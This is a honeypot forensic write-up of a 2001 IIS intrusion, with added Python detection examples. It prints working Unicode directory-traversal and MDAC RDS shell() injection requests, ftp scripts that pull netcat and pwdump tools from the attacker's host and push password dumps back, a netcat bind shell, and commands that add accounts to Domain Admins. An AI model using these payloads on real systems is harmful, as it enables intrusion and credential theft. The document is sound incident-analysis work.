Attacker: 213.116.251.162   TTL 111 (17 hops away)
Honeypot: 172.16.1.106      TTL 127 (1 hop away)
Time offset: +5h

2001/02/04 13:25:09.372695
  tcpdump shows 14:25:09.... So which is it????
  Browser access to the DocumentRoot http://lab.wiretrip.net/

2001/02/04 13:25:14.550077   5 seconds later
  Browser access to /guest/default.asp   Guestbook?
  Referer is set as expected: http://lab.wiretrip.net/
  Images are loaded...
  Cookie: ASPSESSIONIDGQQGGQZK=KPGNFIPAKMIDBOCJNGOAAHBD

2001/02/04 13:25:22.525676   again 8 seconds later
  GET /guest/default.asp/..%C0%AF../..%C0%AF../..%C0%AF../boot.ini
  -> IIS Unicode Directory Traversal Vulnerability (bugtraq id 1806)
  No referer. Cookie matches.
  Also sends the following requests:
    14:25:22.525676 same src port (1765), bad tcp checksum!
    same sequence number, ACKs the same packet (2093)
    25 43 30 25 41 46 (%C0%AF) becomes c0 af 2e 2e 2f 2e
    so it step by step replaces the quoted sequence %C0%AF with its binary equivalent:
    GET /guest/default.asp/....../.../..%C0%AF../..%C0%AF../boot.ini
    GET /guest/default.asp/....../....../..%AF../..%C0%AF../boot.ini
    GET /guest/default.asp/....../....../....../boot.ini
  Server is vulnerable and returns the requested file:
    [boot loader]
    timeout=30
    default=multi(0)disk(0)rdisk(0)partition(1)\WINNT
    [operating systems]
    multi(0)disk(0)rdisk(0)partition(1)\WINNT="Windows NT Server, Enterprise Edition Version 4.00"
    multi(0)disk(0)rdisk(0)partition(1)\WINNT="Windows NT Server, Enterprise Edition Version 4.00 [VGA mode]" /basevideo /sos
  The attacker gains information about the disk layout. The directory holding Windows is named C:\WINNT.

2001/02/04 13:26:35.916198   1 min 12 s later
  Probe for the MS Data Access Component virtual directory: GET /msadc/
  Presents the cookie. Server responds with 403 Forbidden.
  So the directory is there (otherwise it should have issued a 404).

2001/02/04 13:26:49.229673   14 s later
  GET /msadc/msadcs.dll HTTP/1.0
  No cookie in the request header.
  Server responds with 200 OK and Content-Type: application/x-varg
  It appears to be vulnerable!

2001/02/04 13:27:08.159193   19 s later
  POST /msadc/msadcs.dll/AdvancedDataFactory.Query
  -> MDAC RDS Vulnerability (bugtraq id 529)
  in Select * from Customers where City='|shell("cmd /c echo werd >> c:\fun")|'...driver={Microsoft Access Driver (*.mdb)};dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb;
  boundary=!ADM!ROX!YOUR!WORLD!
  Server responds with 100 Continue.
  Attempts to create the file C:\fun, containing the string "werd".

2001/02/04 13:27:15.708044   7 s later
  GET /guest/default.asp/..%C0%AF../..%C0%AF../..%C0%AF../fun
  Retrieve "fun". Server responds with 200 OK and the string "werd". So the exploit was successful.
  Followed by two "hand crafted" packets, again with bad tcp checksum:
    GET /guest/default.asp/....../....../..%AF../..%C0%AF../fun
    GET /guest/default.asp/....../....../....../fun

2001/02/04 13:32:51.574859
  Another shell call: ... shell("cmd /c echo user johna2k > ftpcom")
  Uses the vulnerability in the MS Access ODBC Driver. Uses c:\winnt\help\iis\htm\tutorial\btcustmr.mdb as helper.
  Builds an ftp command script, named "ftpcom":
    user johna2k
    hacker2000
    get samdump.dll
    get pdump.exe
    get nc.exe
    quit
  Now follows the command: cmd /c ftp -s:ftpcom -n www.nether.net
  (-s: name of the script to execute, -n: suppresses the automatic prompt for username and password)
  www.nether.net denies login with 530 Login incorrect. Account cancelled? (freenet.nether.net)
  Subsequent scripted commands are failing, server responds with 530 Please login with USER and PASS
  pdump.exe >> new.pass can't work, because the file hasn't been transferred.
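The two request patterns seen so far, the overlong %C0%AF traversal and the RDS query carrying a shell() call, can both be recognised from the request alone. The following is an added example, not code from the original analysis: a small request classifier that decodes the path the lenient way the vulnerable IIS did (accepting the overlong 2-byte form of "/"), walks the result to see whether it climbs above the web root, and pulls the |...| VBA expression and the dbq= helper database out of an RDS DataFactory query. The sample requests are constructed from the strings quoted above; the function and label names are my own.

```python
import re
from urllib.parse import unquote_to_bytes

# Added example (not part of the original analysis). Label names and the
# sample requests below are my own; the request strings are taken from the
# timeline above.

RDS_PATH = "/msadc/msadcs.dll/advanceddatafactory.query"


def lenient_utf8_decode(data: bytes):
    """Decode bytes as UTF-8 but also accept the 2-byte overlong forms
    (C0 80 .. C1 BF) that a strict decoder rejects.  This mirrors what the
    vulnerable IIS did *after* its path check; a correct decoder refuses
    the sequence instead.  Returns (text, saw_overlong)."""
    out, pending, saw_overlong, i = [], bytearray(), False, 0

    def flush():  # decode any buffered non-ASCII bytes normally
        if pending:
            out.append(pending.decode("utf-8", errors="replace"))
            pending.clear()

    while i < len(data):
        b = data[i]
        if b in (0xC0, 0xC1) and i + 1 < len(data) and 0x80 <= data[i + 1] <= 0xBF:
            flush()
            # C0 AF -> U+002F '/', the overlong encoding the request relies on
            out.append(chr(((b & 0x1F) << 6) | (data[i + 1] & 0x3F)))
            saw_overlong = True
            i += 2
        elif b < 0x80:
            flush()
            out.append(chr(b))
            i += 1
        else:
            pending.append(b)
            i += 1
    flush()
    return "".join(out), saw_overlong


def escapes_web_root(path: str) -> bool:
    """Walk the decoded path; True as soon as '..' climbs above the root."""
    depth = 0
    for seg in re.split(r"[\\/]+", path):
        if seg in ("", "."):
            continue
        depth += -1 if seg == ".." else 1
        if depth < 0:
            return True
    return False


def rds_findings(method: str, path: str, body: str):
    """For a POST to the RDS DataFactory, extract |...| expressions smuggled
    into the SQL text and the dbq= database the query is aimed at."""
    if method.upper() != "POST" or not path.lower().startswith(RDS_PATH):
        return None
    calls = re.findall(r"\|([^|]+)\|", body)
    dbq = re.search(r"dbq=([^;]+)", body, re.IGNORECASE)
    return {"vba_expressions": calls, "dbq": dbq.group(1) if dbq else None}


def classify_request(method: str, raw_path: str, body: str = ""):
    findings = []
    decoded, overlong = lenient_utf8_decode(unquote_to_bytes(raw_path))
    if overlong:
        findings.append("overlong-utf8")
    if escapes_web_root(decoded.split("?", 1)[0]):
        findings.append("directory-traversal")
    rds = rds_findings(method, raw_path, body)
    if rds and rds["vba_expressions"]:
        findings.append("rds-shell")
    return {"decoded_path": decoded, "findings": findings, "rds": rds}


# Constructed sample input, built from the requests quoted in the analysis.
SAMPLE_RDS_BODY = r"""Select * from Customers where City='|shell("cmd /c echo werd >> c:\fun")|'...driver={Microsoft Access Driver (*.mdb)};dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb;"""

SAMPLE_REQUESTS = [
    ("GET", "/guest/default.asp", ""),
    ("GET", "/guest/default.asp/..%C0%AF../..%C0%AF../..%C0%AF../boot.ini", ""),
    ("POST", "/msadc/msadcs.dll/AdvancedDataFactory.Query", SAMPLE_RDS_BODY),
]

if __name__ == "__main__":
    for method, path, body in SAMPLE_REQUESTS:
        result = classify_request(method, path, body)
        print(method, path, "->", result["findings"] or ["clean"])
        print("   decoded:", result["decoded_path"])
        if result["rds"]:
            print("   rds:", result["rds"])
```

The decoder deliberately reports the overlong form as a separate finding: a request can be flagged on the encoding alone, before the traversal check, because a legitimate client never emits C0 AF.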
  The attacker tries to upload "new.pass".
  Builds a new ftp command script, named ftpcom2:
    user johna2k
    hacker2000
    put new.pass
    quit
  >>> upload retrieved passwords
  ftp -s:ftpcom2 -n www.nether.net
  Login fails again.

13:34:31.242151
  Browser active, grabs a few images.
  The hacker recognizes that his account on nether.net has been disabled.
  By accident the hacker immediately starts an ftp session: cmd /c ftp 213.116.251.162
  The ftp session hangs, because the shell isn't interactive.

2001/02/04 13:34:47.612437
  Creates a new ftp command script, named "ftpcom" again (overwrites the old one):
    open 213.116.251.162
    johna2k
    hacker2000
    get samdump.dll
    get pdump.exe
    get nc.exe
    quit
  Attempts to ftp to his own computer: ftp -s:ftpcom
  (213.116.251.162 resolves to 1Cust162.tnt13.stk3.da.uu.net)

2001/02/04 13:38:27.521384
  open 212.139.12.26 (forgot to redirect to sasfile?)
  212.139.12.26 resolves to freedu-12-26.libertysurf.se
  Creates another ftp command script, named sasfile (typo?):
    johna2k
    haxedj00
    get pdump.exe
    get samdump.dll
    get nc.exe
    quit
  ftp -s:sasfile
  Doesn't work? Try your own machine...

2001/02/04 13:40:11.229519
  open 213.116.251.162 (forgot the redirection again, further commands will be appended to sasfile)
    johna2k
    haxedj00
    get pdump.exe
    get samdump.dll
    get nc.exe
    quit
  ftp -s:sasfile

2001/02/04 13:41:03.136533
  And now for something completely different, the Unicode Directory Traversal Vulnerability:
  GET /msadc/....../.../..%C0%AF../..%C0%AF../winnt/system32/cmd.exe?/c+copy+C:\winnt\system32\cmd.exe+cmd1.exe
  >>> copy the command interpreter as "cmd1.exe" into the current directory
  GET /msadc/..%C0%AF../..%C0%AF../..%C0%AF../program%20files/common%20files/system/msadc/cmd1.exe?/c+echo+open+213.116.251.162+>ftpcom
  >>> tries again to create an ftp command script (named ftpcom), now using proper redirection:
    --- begin - ftpcom ---
    open 213.116.251.162
    johna2k
    haxedj00
    get nc.exe
    get pdump.exe
    get samdump.dll
    quit
    --- end -- ftpcom ----
  ftp -s:ftpcom
  ftp login successful, files are transferred using ASCII mode!!! Argh!!!
    nc.exe       59392 bytes, looks like netcat, based on file size and embedded strings
    pdump.exe    32768 bytes, contains the strings: LSASS.EXE, Pwdump2, dump the sam database,
                 Usage: %s, needs samdump.dll, creates or attaches to a named pipe \\pipe\\pwdump2
    samdump.dll  36864 bytes
  13:42:55.244260 transfer completed

2001/02/04 13:42:42.787971
  While the transfer is still in progress, the blackhat runs netcat, connecting port 6969 to the command interpreter:
  nc -l -p 6969 -e cmd1.exe   (Unicode vuln.)

13:42:49.195696
  Attacker connects to the rootshell on port 6969. A cmd prompt appears, current working directory is C:\Program files\Common files\system\msadc

13:43:31.075053 dir
   Volume in drive C has no label.
   Volume Serial Number is 8403-6A0E

   Directory of C:\Program Files\Common Files\system\msadc

  02/04/01  06:41a                .
  02/04/01  06:41a                ..
  09/25/97  07:41a            596 adcjavas.inc
  09/25/97  07:41a            589 adcvbs.inc
  04/30/97  11:00p        208,144 cmd1.exe
  02/04/01  06:41a             98 ftpcom
  09/25/97  08:28a        172,816 msadce.dll
  09/25/97  08:16a          5,632 msadcer.dll
  09/25/97  08:24a         23,312 msadcf.dll
  09/25/97  08:24a         91,408 msadco.dll
  09/25/97  08:19a          5,120 msadcor.dll
  09/26/97  08:19a         42,256 msadcs.dll
  02/04/01  06:41a         59,392 nc.exe
  02/04/01  06:41a         32,768 pdump.exe
  10/02/97  07:28a         19,388 readme.txt
  02/04/01  06:41a         36,864 samdump.dll
          16 File(s)      698,383 bytes
                    1,690,861,056 bytes free

  C:\Program Files\Common Files\system\msadc>
  C:\Program Files\Common Files\system\msadc>

13:43:52.580779 Using the RDS vuln: C:\Program Files\Common Files\system\msadc\pdump.exe >> yay.txt
  Attacker typed "dir" again:
   Volume in drive C has no label.
   Volume Serial Number is 8403-6A0E

   Directory of C:\Program Files\Common Files\system\msadc

  02/04/01  06:41a                .
  02/04/01  06:41a                ..
  09/25/97  07:41a            596 adcjavas.inc
  09/25/97  07:41a            589 adcvbs.inc
  04/30/97  11:00p        208,144 cmd1.exe
  02/04/01  06:41a             98 ftpcom
  09/25/97  08:28a        172,816 msadce.dll
  09/25/97  08:16a          5,632 msadcer.dll
  09/25/97  08:24a         23,312 msadcf.dll
  09/25/97  08:24a         91,408 msadco.dll
  09/25/97  08:19a          5,120 msadcor.dll
  09/26/97  08:19a         42,256 msadcs.dll
  02/04/01  06:41a         59,392 nc.exe
  02/04/01  06:41a         32,768 pdump.exe
  10/02/97  07:28a         19,388 readme.txt
  02/04/01  06:41a         36,864 samdump.dll
          16 File(s)      698,383 bytes
                    1,690,861,056 bytes free

  C:\Program Files\Common Files\system\msadc>
  C:\Program Files\Common Files\system\msadc>
  The file "yay.txt" is not there.
  Tries again, hits ESC-A by accident:
  [Adir
  The name specified is not recognized as an internal or external command, operable program or batch file.
  C:\Program Files\Common Files\system\msadc>

13:44:05.245136 dir again. yay.txt still not there.
13:44:10 del ftpcom
13:44:13 ls
  The name specified is not recognized as an internal or external command, operable program or batch file.
13:44:14 dir again
   Volume in drive C has no label.
   Volume Serial Number is 8403-6A0E

   Directory of C:\Program Files\Common Files\system\msadc

  02/04/01  06:43a                .
  02/04/01  06:43a                ..
  09/25/97  07:41a            596 adcjavas.inc
  09/25/97  07:41a            589 adcvbs.inc
  04/30/97  11:00p        208,144 cmd1.exe
  09/25/97  08:28a        172,816 msadce.dll
  09/25/97  08:16a          5,632 msadcer.dll
  09/25/97  08:24a         23,312 msadcf.dll
  09/25/97  08:24a         91,408 msadco.dll
  09/25/97  08:19a          5,120 msadcor.dll
  09/26/97  08:19a         42,256 msadcs.dll
  02/04/01  06:41a         59,392 nc.exe
  02/04/01  06:41a         32,768 pdump.exe
  10/02/97  07:28a         19,388 readme.txt
  02/04/01  06:41a         36,864 samdump.dll
          15 File(s)      698,285 bytes
                    1,690,861,056 bytes free

  C:\Program Files\Common Files\system\msadc>

13:44:20 type readme.e
  The system cannot find the file specified.
13:44:36 Using RDS: C:\Program Files\Common Files\system\msadc\pdump.exe >> c:\yay.txt
13:44:42 Tries to change the volume, but fails:
  The filename, directory name, or volume label syntax is incorrect.
13:44:44 dir
   Volume in drive C has no label.
   Volume Serial Number is 8403-6A0E

   Directory of C:\

  11/26/00  12:34p              0 AUTOEXEC.BAT
  11/26/00  06:57p            322 boot.ini
  11/26/00  12:34p              0 CONFIG.SYS
  12/26/00  07:36p                exploits
  02/04/01  06:26a              7 fun
  12/07/00  03:30p                InetPub
  12/07/00  03:12p                Multimedia Files
  12/26/00  07:10p                New Folder
  01/26/01  02:10p     78,643,200 pagefile.sys
  12/21/00  08:59p                Program Files
  12/21/00  08:59p                TEMP
  02/04/01  06:42a                WINNT
  12/26/00  07:09p                wiretrip
  02/04/01  06:43a              0 yay.txt
          14 File(s)   78,643,529 bytes
                    1,690,861,056 bytes free

  C:\>

13:44:51 rm
  The name specified is not recognized as an internal or external command, operable program or batch file.
13:44:54 del fun
13:44:55 dir
   Volume in drive C has no label.
   Volume Serial Number is 8403-6A0E

   Directory of C:\

  11/26/00  12:34p              0 AUTOEXEC.BAT
  11/26/00  06:57p            322 boot.ini
  11/26/00  12:34p              0 CONFIG.SYS
  12/26/00  07:36p                exploits
  12/07/00  03:30p                InetPub
  12/07/00  03:12p                Multimedia Files
  12/26/00  07:10p                New Folder
  01/26/01  02:10p     78,643,200 pagefile.sys
  12/21/00  08:59p                Program Files
  12/21/00  08:59p                TEMP
  02/04/01  06:42a                WINNT
  12/26/00  07:09p                wiretrip
  02/04/01  06:43a              0 yay.txt
          13 File(s)   78,643,522 bytes
                    1,690,861,056 bytes free

  C:\>

13:45:00 cd exploites
  The system cannot find the path specified.
13:45:01 dir again
13:45:03 cd exploits
  C:\exploits>
13:45:04 dir
   Volume in drive C has no label.
   Volume Serial Number is 8403-6A0E

   Directory of C:\exploits

  12/26/00  07:36p                .
  12/26/00  07:36p                ..
  12/26/00  07:36p                microsoft
  12/26/00  07:35p                newfiles
  12/26/00  07:24p                unix
           5 File(s)            0 bytes
                    1,690,861,056 bytes free

  C:\exploits>

13:45:10 cd microsoft
  C:\exploits\microsoft>
13:45:10 dir
   Volume in drive C has no label.
   Volume Serial Number is 8403-6A0E

   Directory of C:\exploits\microsoft

  12/26/00  07:36p                .
  12/26/00  07:36p                ..
  11/05/97  09:46a         87,312 95sscrk.zip
  08/15/00  02:06p            734 ac.zip
  08/12/98  09:46a          9,417 anger.tar.gz
           5 File(s)       97,463 bytes
                    1,690,861,056 bytes free

  C:\exploits\microsoft>

13:45:22 cd ..
  C:\exploits>
13:45:25 cd newfiles
  C:\exploits\newfiles>
13:45:26 dir
   Volume in drive C has no label.
   Volume Serial Number is 8403-6A0E

   Directory of C:\exploits\newfiles

  12/26/00  07:35p                .
  12/26/00  07:35p                ..
           2 File(s)            0 bytes
                    1,690,861,056 bytes free

  C:\exploits\newfiles>

13:45:29 cd ..
  C:\exploits>
13:45:30 cd unix
  C:\exploits\unix>
13:45:31 dir
   Volume in drive C has no label.
   Volume Serial Number is 8403-6A0E

   Directory of C:\exploits\unix

  12/26/00  07:24p                .
  12/26/00  07:24p                ..
  12/26/00  07:25p                sunos-exploits
  12/26/00  07:24p                tcp-exploits
  12/26/00  07:24p                trojans
  12/26/00  07:16p                udp-exploits
  12/26/00  07:15p                ultrix-exploits
  12/26/00  07:15p                xwin-exploits
           8 File(s)            0 bytes
                    1,690,861,056 bytes free

  C:\exploits\unix>

13:45:37 cd ..
  C:\exploits>
13:45:37 dir
   Volume in drive C has no label.
   Volume Serial Number is 8403-6A0E

   Directory of C:\exploits

  12/26/00  07:36p                .
  12/26/00  07:36p                ..
  12/26/00  07:36p                microsoft
  12/26/00  07:35p                newfiles
  12/26/00  07:24p                unix
           5 File(s)            0 bytes
                    1,690,861,056 bytes free

  C:\exploits>

13:45:40 cd ..
  C:\>
13:45:40 dir
   Volume in drive C has no label.
   Volume Serial Number is 8403-6A0E

   Directory of C:\

  11/26/00  12:34p              0 AUTOEXEC.BAT
  11/26/00  06:57p            322 boot.ini
  11/26/00  12:34p              0 CONFIG.SYS
  12/26/00  07:36p                exploits
  12/07/00  03:30p                InetPub
  12/07/00  03:12p                Multimedia Files
  12/26/00  07:10p                New Folder
  01/26/01  02:10p     78,643,200 pagefile.sys
  12/21/00  08:59p                Program Files
  12/21/00  08:59p                TEMP
  02/04/01  06:42a                WINNT
  12/26/00  07:09p                wiretrip
  02/04/01  06:43a              0 yay.txt
          13 File(s)   78,643,522 bytes
                    1,690,861,056 bytes free

  C:\>

14:45:55 RDS: pdump.exe >> c:\yay.txt
13:45:58 dir
   Volume in drive C has no label.
   Volume Serial Number is 8403-6A0E

   Directory of C:\

  11/26/00  12:34p              0 AUTOEXEC.BAT
  11/26/00  06:57p            322 boot.ini
  11/26/00  12:34p              0 CONFIG.SYS
  12/26/00  07:36p                exploits
  12/07/00  03:30p                InetPub
  12/07/00  03:12p                Multimedia Files
  12/26/00  07:10p                New Folder
  01/26/01  02:10p     78,643,200 pagefile.sys
  12/21/00  08:59p                Program Files
  12/21/00  08:59p                TEMP
  02/04/01  06:44a                WINNT
  12/26/00  07:09p                wiretrip
  02/04/01  06:43a              0 yay.txt
          13 File(s)   78,643,522 bytes
                    1,690,861,056 bytes free

  C:\>

13:46:01 dir'
  The name specified is not recognized as an internal or external command, operable program or batch file.
  C:\>
13:46:06 cat yay.txt
  The name specified is not recognized as an internal or external command, operable program or batch file.
13:46:08 type yay
  The system cannot find the file specified.
13:46:11 type yay.txt
13:46:20 net session
  System error 5 has occurred.
  Access is denied.
13:46:24 net users
  User accounts for \\
  -------------------------------------------------------------------------------
  Administrator            Guest                    IUSR_KENNY
  IWAM_KENNY
  The command completed with one or more errors.
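At 13:41 the analysis identified the uploaded tools by file size and by the strings embedded in them (pdump.exe: LSASS.EXE, Pwdump2, dump the sam database, needs samdump.dll, the pwdump2 named pipe). The following is an added example, not code from the original analysis, that turns that manual check into a function: it extracts printable ASCII runs the way the strings utility does and matches them, together with the file size, against indicators taken from the analysis. The sample "binary" is constructed here so the example runs offline; the exact on-disk spelling of the pipe name is an assumption, as are the function and dictionary names.

```python
import re

# Added example (not part of the original analysis).  Sizes and indicator
# strings come from the timeline above; the sample blob is constructed.

# Sizes of the three files transferred at 13:41 (from the analysis).
KNOWN_SIZES = {"nc.exe": 59392, "pdump.exe": 32768, "samdump.dll": 36864}

# Strings the analysis reports inside pdump.exe.  The pipe-name spelling
# (backslash-separated) is an assumption about how the binary stores it.
INDICATORS = {
    "pdump.exe": [
        "LSASS.EXE",
        "Pwdump2",
        "dump the sam database",
        "needs samdump.dll",
        r"\pipe\pwdump2",
    ],
}


def extract_strings(data: bytes, min_len: int = 4):
    """Return printable-ASCII runs of at least min_len bytes (like `strings`)."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.decode("ascii") for m in re.findall(pattern, data)]


def identify(data: bytes, sizes=KNOWN_SIZES, indicators=INDICATORS):
    """Match a file against the known tools by size and by embedded strings.

    Returns {"size_matches": [names], "strings_matched": {name: [hits]}}.
    A size match alone is weak evidence (the analysis used size only as a
    first hint), so the two signals are reported separately."""
    found = extract_strings(data)
    size_matches = [name for name, size in sizes.items() if len(data) == size]
    strings_matched = {}
    for name, needles in indicators.items():
        hits = [n for n in needles if any(n in s for s in found)]
        if hits:
            strings_matched[name] = hits
    return {"size_matches": size_matches, "strings_matched": strings_matched}


# Constructed sample: a fake PE-like blob carrying the strings the analysis
# lists for pdump.exe, padded with NUL bytes to the reported 32768 bytes.
_PAYLOAD = (
    b"MZ\x90\x00\x03\x00\x00\x00"
    + b"LSASS.EXE\x00"
    + b"Pwdump2 - dump the sam database\x00"
    + b"Usage: %s\x00"
    + b"needs samdump.dll\x00"
    + b"\\\\.\\pipe\\pwdump2\x00"
)
SAMPLE_PDUMP_BLOB = _PAYLOAD + b"\x00" * (KNOWN_SIZES["pdump.exe"] - len(_PAYLOAD))

if __name__ == "__main__":
    print(identify(SAMPLE_PDUMP_BLOB))
    print(identify(b"\x00" * 16))  # nothing recognisable
```

Run against a real capture, the size match would be taken from the file on disk and the string hits would be the evidence to keep in the report; a file that matches on size but carries none of the strings deserves a closer look rather than a label.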
13:47:37 RDS: net session >> yay2.txt
13:47:55 RDS: net session >> c:\yay2.txt
13:48:53 dir
   Volume in drive C has no label.
   Volume Serial Number is 8403-6A0E

   Directory of C:\

  11/26/00  12:34p              0 AUTOEXEC.BAT
  11/26/00  06:57p            322 boot.ini
  11/26/00  12:34p              0 CONFIG.SYS
  12/26/00  07:36p                exploits
  12/07/00  03:30p                InetPub
  12/07/00  03:12p                Multimedia Files
  12/26/00  07:10p                New Folder
  01/26/01  02:10p     78,643,200 pagefile.sys
  12/21/00  08:59p                Program Files
  12/21/00  08:59p                TEMP
  02/04/01  06:46a                WINNT
  12/26/00  07:09p                wiretrip
  02/04/01  06:43a              0 yay.txt
  02/04/01  06:46a             38 yay2.txt
          14 File(s)   78,643,560 bytes
                    1,690,861,056 bytes free

  C:\>

13:48:59 type yay2.txt
  There are no entries in the list.
13:49:07 del yay2.txt
13:49:14 net session >>yay3.txt
  System error 5 has occurred.
  Access is denied.
  C:\>
13:49:14 dir
   Volume in drive C has no label.
   Volume Serial Number is 8403-6A0E

   Directory of C:\

  11/26/00  12:34p              0 AUTOEXEC.BAT
  11/26/00  06:57p            322 boot.ini
  11/26/00  12:34p              0 CONFIG.SYS
  12/26/00  07:36p                exploits
  12/07/00  03:30p                InetPub
  12/07/00  03:12p                Multimedia Files
  12/26/00  07:10p                New Folder
  01/26/01  02:10p     78,643,200 pagefile.sys
  12/21/00  08:59p                Program Files
  12/21/00  08:59p                TEMP
  02/04/01  06:46a                WINNT
  12/26/00  07:09p                wiretrip
  02/04/01  06:43a              0 yay.txt
  02/04/01  06:48a              0 yay3.txt
          14 File(s)   78,643,522 bytes
                    1,690,861,056 bytes free

  C:\>

13:49:21 del yay&
  Could Not Find C:\yay
  The name specified is not recognized as an internal or external command, operable program or batch file.
  C:\>
13:49:22 dir again
13:49:28 del yay*
  C:\yay.txt
  The process cannot access the file because it is being used by another process.
  C:\>
  >>> pdump.exe is still running and accesses yay.txt
13:49:37 del yay3.txt
  Could Not Find C:\yay3.txt
  C:\>
13:49:38 dir
   Volume in drive C has no label.
   Volume Serial Number is 8403-6A0E

   Directory of C:\

  11/26/00  12:34p              0 AUTOEXEC.BAT
  11/26/00  06:57p            322 boot.ini
  11/26/00  12:34p              0 CONFIG.SYS
  12/26/00  07:36p                exploits
  12/07/00  03:30p                InetPub
  12/07/00  03:12p                Multimedia Files
  12/26/00  07:10p                New Folder
  01/26/01  02:10p     78,643,200 pagefile.sys
  12/21/00  08:59p                Program Files
  12/21/00  08:59p                TEMP
  02/04/01  06:46a                WINNT
  12/26/00  07:09p                wiretrip
  02/04/01  06:43a              0 yay.txt
          13 File(s)   78,643,522 bytes
                    1,690,861,056 bytes free

  C:\>

13:59:54 RDS: net users >>heh.txt
13:50:00 RDS: net users >>c:\heh.txt
13:50:03 dir
   Volume in drive C has no label.
   Volume Serial Number is 8403-6A0E

   Directory of C:\

  11/26/00  12:34p              0 AUTOEXEC.BAT
  11/26/00  06:57p            322 boot.ini
  11/26/00  12:34p              0 CONFIG.SYS
  12/26/00  07:36p                exploits
  02/04/01  06:48a            263 heh.txt
  12/07/00  03:30p                InetPub
  12/07/00  03:12p                Multimedia Files
  12/26/00  07:10p                New Folder
  01/26/01  02:10p     78,643,200 pagefile.sys
  12/21/00  08:59p                Program Files
  12/21/00  08:59p                TEMP
  02/04/01  06:48a                WINNT
  12/26/00  07:09p                wiretrip
  02/04/01  06:43a              0 yay.txt
          14 File(s)   78,643,785 bytes
                    1,690,861,056 bytes free

  C:\>

13:50:08 yuper
  The name specified is not recognized as an internal or external command, operable program or batch file.
13:50:10 type heh.txt
  User accounts for \\
  -------------------------------------------------------------------------------
  Administrator            Guest                    IUSR_KENNY
  WAM_KENNY
  The command completed with one or more errors.
  C:\>
13:50:15 del heh.txt
  C:\>
13:50:20 cd program files
  C:\Program Files> dir
   Volume in drive C has no label.
   Volume Serial Number is 8403-6A0E

   Directory of C:\Program Files

  12/21/00  08:59p                .
  12/21/00  08:59p                ..
  12/07/00  03:11p                Common Files
  12/21/00  08:59p                D4
  12/07/00  03:23p                ICW-Internet Connection Wizard
  12/07/00  03:37p                Microsoft FrontPage
  12/07/00  03:34p                Mts
  12/07/00  03:23p                Outlook Express
  11/26/00  06:42p                Plus!
  12/16/00  06:54p                Syslogd
  11/26/00  06:56p                Windows NT
          11 File(s)            0 bytes
                    1,690,861,056 bytes free

  C:\Program Files>

13:50:26 cd ..
  C:\>
13:50:26 dir
   Volume in drive C has no label.
   Volume Serial Number is 8403-6A0E

   Directory of C:\

  11/26/00  12:34p              0 AUTOEXEC.BAT
  11/26/00  06:57p            322 boot.ini
  11/26/00  12:34p              0 CONFIG.SYS
  12/26/00  07:36p                exploits
  12/07/00  03:30p                InetPub
  12/07/00  03:12p                Multimedia Files
  12/26/00  07:10p                New Folder
  01/26/01  02:10p     78,643,200 pagefile.sys
  12/21/00  08:59p                Program Files
  12/21/00  08:59p                TEMP
  02/04/01  06:48a                WINNT
  12/26/00  07:09p                wiretrip
  02/04/01  06:43a              0 yay.txt
          13 File(s)   78,643,522 bytes
                    1,690,861,056 bytes free

  C:\>

13:50:28 echo Hi, i know that this a is a lab server, but patch the holes! :-) >>README.NOW.Hax0r
  C:\>
13:50:54
   Volume in drive C has no label.
   Volume Serial Number is 8403-6A0E

   Directory of C:\

  11/26/00  12:34p              0 AUTOEXEC.BAT
  11/26/00  06:57p            322 boot.ini
  11/26/00  12:34p              0 CONFIG.SYS
  12/26/00  07:36p                exploits
  12/07/00  03:30p                InetPub
  12/07/00  03:12p                Multimedia Files
  12/26/00  07:10p                New Folder
  01/26/01  02:10p     78,643,200 pagefile.sys
  12/21/00  08:59p                Program Files
  02/04/01  06:49a             69 README.NOW.Hax0r
  12/21/00  08:59p                TEMP
  02/04/01  06:48a                WINNT
  12/26/00  07:09p                wiretrip
  02/04/01  06:43a              0 yay.txt
          14 File(s)   78,643,591 bytes
                    1,690,861,056 bytes free

  C:\>

13:51:06 dir again
13:51:31 net group
  Group Accounts for \\
  -------------------------------------------------------------------------------
  *Domain Admins           *Domain Guests           *Domain Users
  The command completed with one or more errors.
  C:\>
13:51:35 net localgroup
  System error 1312 has occurred.
  A specified logon session does not exist. It may already have been terminated.
  C:\>
13:51:42 net group domain admins
  The syntax of this command is:
  NET GROUP [groupname [/COMMENT:"text"]] [/DOMAIN]
            groupname {/ADD [/COMMENT:"text"] | /DELETE} [/DOMAIN]
            groupname username [...] {/ADD | /DELETE} [/DOMAIN]
  C:\>
13:51:54 [Anet group /?
  The name specified is not recognized as an internal or external command, operable program or batch file.
  C:\>
13:52:00 net group ??
  The syntax of this command is:
  NET GROUP [groupname [/COMMENT:"text"]] [/DOMAIN]
            groupname {/ADD [/COMMENT:"text"] | /DELETE} [/DOMAIN]
            groupname username [...] {/ADD | /DELETE} [/DOMAIN]
  C:\>
13:52:03 net group /?
  The syntax of this command is:
  NET GROUP [groupname [/COMMENT:"text"]] [/DOMAIN]
            groupname {/ADD [/COMMENT:"text"] | /DELETE} [/DOMAIN]
            groupname username [...] {/ADD | /DELETE} [/DOMAIN]
  C:\>
13:52:09 net group
  Group Accounts for \\
  -------------------------------------------------------------------------------
  *Domain Admins           *Domain Guests           *Domain Users
  The command completed with one or more errors.
  C:\>
13:52:32 net localgroup
  System error 1312 has occurred.
  A specified logon session does not exist. It may already have been terminated.
  C:\>
13:52:48 net localgroup /domain admins
  System error 1312 has occurred.
  A specified logon session does not exist. It may already have been terminated.
  C:\>
13:53:06 net localgroup domain admins
  The syntax of this command is:
  NET LOCALGROUP [groupname [/COMMENT:"text"]] [/DOMAIN]
                 groupname {/ADD [/COMMENT:"text"] | /DELETE} [/DOMAIN]
                 groupname name [...] {/ADD | /DELETE} [/DOMAIN]
  C:\>
13:53:27 net users
  User accounts for \\
  -------------------------------------------------------------------------------
  Administrator            Guest                    IUSR_KENNY
  IWAM_KENNY
  The command completed with one or more errors.
  C:\>
13:53:39 RDS: net localgroup Domain Admins IWAM_KENNY /ADD
13:54:03 RDS: net localgroup Domain Admins IUSR_KENNY /ADD
13:54:10 net session
  System error 5 has occurred.
  Access is denied.
  C:\>
13:54:20 RDS aborted?!
13:54:25 [Anet localgroup domain admins
  The name specified is not recognized as an internal or external command, operable program or batch file.
  C:\>
13:54:43 net group domain admins
  The syntax of this command is:
  NET GROUP [groupname [/COMMENT:"text"]] [/DOMAIN]
            groupname {/ADD [/COMMENT:"text"] | /DELETE} [/DOMAIN]
            groupname username [...]
